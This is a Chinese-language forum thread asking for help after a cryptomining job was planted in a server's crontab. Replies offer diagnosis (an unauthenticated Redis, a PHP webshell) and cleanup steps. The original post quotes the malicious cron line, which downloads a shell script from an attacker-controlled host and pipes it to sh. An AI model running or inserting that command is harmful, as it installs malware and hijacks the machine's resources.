首页   注册   登录
V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
Distributions
Ubuntu
Fedora
CentOS
中文资源站
网易开源镜像站
V2EX  ›  Linux

求助,服务器 crontab 被人异常加入挖矿脚本

  •  
  •   guanhui07 · 29 天前 · 1092 次点击

    线上服务器 crontab 被人异常加入挖矿脚本 添加的脚本如下:

    */6 * * * * curl -fsSL http://w.3ei.xyz:43768/init.sh | sh > /dev/null 2>&1 
    

    服务器 阿里云 ceontos7 8 核心 8g 内存

    环境 openresty/1.13.6.2 mysql5.7 php7.2.6 redis rabbitmq

    ssh 修改了 35523 端口,禁止了 root 登录,但开了几个账号公司员工登录,密码足够复杂,

    过程如上..还没解决 ,有遇到的留言 讨论下 ,哪里漏洞 解决方法,谢谢

    18 回复  |  直到 2019-04-03 18:32:28 +08:00
        1
    CallMeReznov   29 天前   ♥ 2
    我以为直接重装的我都够消极了
    没想到还有直接改 HOST 的

    大佬毕竟是大佬
        2
    aulia   29 天前 via Android
    你们机器上是不是有个空密码的 redis 在跑?
        3
    Tink   29 天前 via iPhone
    注释了就行
        4
    BigPig666   29 天前
    又不是不能用。。。
        5
    guanhui07   29 天前
    @aulia 是 但 redis 端口没开放给对外 ,bind 127.0.0.1
        6
    zsy979   29 天前
    昨天刚发现测试环境跑了个 xmrig。。。 又不是不能用
        7
    pmispig   29 天前
    估计 php 有漏洞被渗透获取了 webshell,你先检查下有没有奇怪的 php 文件
        8
    d0m2o08   29 天前
    把 curl 和 wget 删掉,又不是不能用
        9
    qsmy   29 天前
    还真不能用,一般都是挖门罗币,CPU 给你占满。redis 没设密码。被黑进服务器执行木马代码。定时还关不掉。高级的不止改 cron,还有伪造系统进程 httpdns、篡改系统文件 libntp.so 全程守护。
        10
    wzaqqq   29 天前
    遇到过类似的,把常用命令感染了,比对下 ss netstat top 之类的二进制的时间,不放心就一个个换。
        11
    qsmy   29 天前
    曾经分析过,感觉挺暴利的。原理还简单,利用 redis 无密码的越权漏洞,还写个 Python 扫局域网里有相同漏洞的机子。
        12
    miyuki   29 天前 via Android
    redis 公网?
        13
    miyuki   29 天前 via Android
    @miyuki 没仔细看,我瞎了

    建议重装吧
        14
    viruser   29 天前 via Android
    草(日本语),这玩意连 debug_info 都没删,那专杀脚本快出了,如果着急联系下搞安全的公司
        15
    viruser   29 天前 via Android
    我不是专业的人员,所以下面内容我也不知道有没有作用...这个软件总体原理和之前的几个挖矿软件类似,修改 crontab,修改 rm,拷贝挖矿本体,看看能不能用之前的脚本删除 crontab 里的内容,然后用 busybox rm 删除 /etc/pvds /etc/httpdz /etc/migrations 还有 /etc/init.d/ats, 检查 chkconfig, 最后检查下 /tmp 下的文件。最好在 /etc/hosts 里加上 127.0.0.1 w.3ei.xyz 127.0.0.1 w.21-3n.xyz 。
        16
    glasslion   29 天前
    @guanhui07 是用的阿里云的专有网络还是经典网络?
        17
    libook   29 天前
    Rootkit ?

    这个得亲自上机诊断才知道怎么解决吧,可以花钱找安全公司,不过有可能会比较贵。
    要是机器上没有业务数据或可以安全备份业务数据,可能重装重新部署会更快更有效。
    SSH 禁用密码只允许秘钥方式登录,然后所有服务都以非 root 最小权限方式运行,也可以考虑用容器直接隔离。
        18
    rootww21   15 天前
    以前碰到过 redis 无密码 挖矿程序跑满
    关于   ·   FAQ   ·   API   ·   我们的愿景   ·   广告投放   ·   感谢   ·   实用小工具   ·   2578 人在线   最高记录 4385   ·  
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.3 · 31ms · UTC 14:59 · PVG 22:59 · LAX 07:59 · JFK 10:59
    ♥ Do have faith in what you're doing.
    沪ICP备16043287号-1